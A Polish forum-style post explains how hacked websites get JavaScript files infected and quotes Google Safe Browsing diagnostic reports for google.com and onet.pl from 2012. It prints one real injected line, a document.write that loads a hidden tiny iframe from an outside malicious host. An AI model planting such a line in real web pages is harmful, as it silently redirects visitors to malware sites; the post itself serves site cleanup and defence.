Zazwyczaj są zainfekowane pliki *.js przez jakiś skrypt na stronie albo poprzez system komentarzy cz inputów które nie są zabezpieczone i jest możliwość wykonania kodu lub też istnieją luki w systemie cms. Ponadto jak są też jakieś linki (np. w bazie danych), pliki na stronie, które rozsyłają spam.
Doklejąją na końcu linii js ramkę z kodem, np.:
Kod
document.write('<iframe src="http://Rob.intelextraction.org/bcxbsdb.cgi?7" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');
owa ramka oczywiście przekieruję na inną stronę.
Dla sprawdzenia jakie pliki zostały zmodyfikowane najlepiej podglonąć na serwerze po dacie modyfikacji.
Dla ciekawości sprawdziłem 2012-12-05 narzędziem Googla SafeBrowsing witrynę google.com (witryna
www.google.com jest interpretowana jako inna i dlatego witryna z przedrostkiem www i bez niego to dwie odmienne witryny) i co ciekawego zobaczyłem:
bez www
http://www.google.com/safebrowsing/diagnos...site=google.comz www
http://www.google.com/safebrowsing/diagnos...=www.google.comPorada udzielana przez GoogleBezpieczne przeglądanie
Strona diagnostyczna witryny google.com
Jaki jest obecny stan bezpieczeństwa witryny google.com?
Ta witryna nie jest obecnie uznawana za podejrzaną.
W ciągu ostatnich 90 dni część tej witryny została odnotowana z uwagi na podejrzane działania następującą liczbę razy: 16.
Co się stało podczas odwiedzin tej witryny przez Google?
W ciągu ostatnich 90 dni przetestowaliśmy w tej witrynie następującą liczbę stron: 555281. Wyświetlanie 30 z nich spowodowało pobranie i zainstalowanie złośliwego oprogramowania bez zgody użytkownika. Witryna ta po raz ostatni była odwiedzana przez Google 2012-12-05, a po raz ostatni znaleziono w niej podejrzane treści 2012-12-04.
Złośliwe oprogramowanie obejmuje 225 trojan(s), 12 scripting exploit(s), 10 exploit(s). Udane zainfekowanie powodowało pojawienie się na komputerze docelowym średnio następującej liczby nowych procesów: 6.
Złośliwe oprogramowanie działa w następującej liczbie domen: 26, m.in. imaginginsider.com/, dgsdfhsdfh.osa.pl/, relay-hosting.net/.
Wykryliśmy następującą liczbę domen: 15, które, jak się wydaje, pośredniczyły w rozpowszechnianiu złośliwego oprogramowania wśród użytkowników tej witryny, m.in. googleusercontent.com/, skating-board.com/, endlessyears.com/.
Ta witryna działała w następującej liczbie sieci: 108, m.in. AS15169 (Google Internet Backbone), AS12956 (TELEFONICA), AS36040 (Bandaid XT+).
Czy ta witryna pośredniczyła w rozpowszechnianiu złośliwego oprogramowania?
Wydaje się, że w ciągu ostatnich 90 dni witryna google.com pośredniczyła w zarażeniu następującej liczby witryn: 21, m.in. www.jazaan.com.googlepages.com/, stroupecondoblog.com/, feedreader.com/.
Czy w tej witrynie działało złośliwe oprogramowanie?
Tak, w ciągu ostatnich 90 dni było w tej witrynie złośliwe oprogramowanie. Została przez nie zarażona następująca liczba domen: 3, m.in. juqi.com/, stonemountainvw.com/, hahait.com/.
... Oczywiście takie zainfekowania wynikają z m.in. z usługi Witryny Google gdzie użytkownicy mają swoje witryny
Tu dla domeny onetu bez www
http://www.google.com/safebrowsing/diagnostic?site=onet.plz www
http://www.google.com/safebrowsing/diagnos...ite=www.onet.plPo usunięciu złośliwości ze strony wyszukiwarka Google różnie dochodzi do siebie. Widać, że niekiedy blokuje nadal domenę z www natomiast nie blokuję domeny bez www. Niestety jakby znalazła taką liczbę złośliwych skryptów na naszej domenie to od razu ustawi celownik na główną domenę nawet jak mamy zainfekowaną np. jedną witrynę wykorzystującą alias .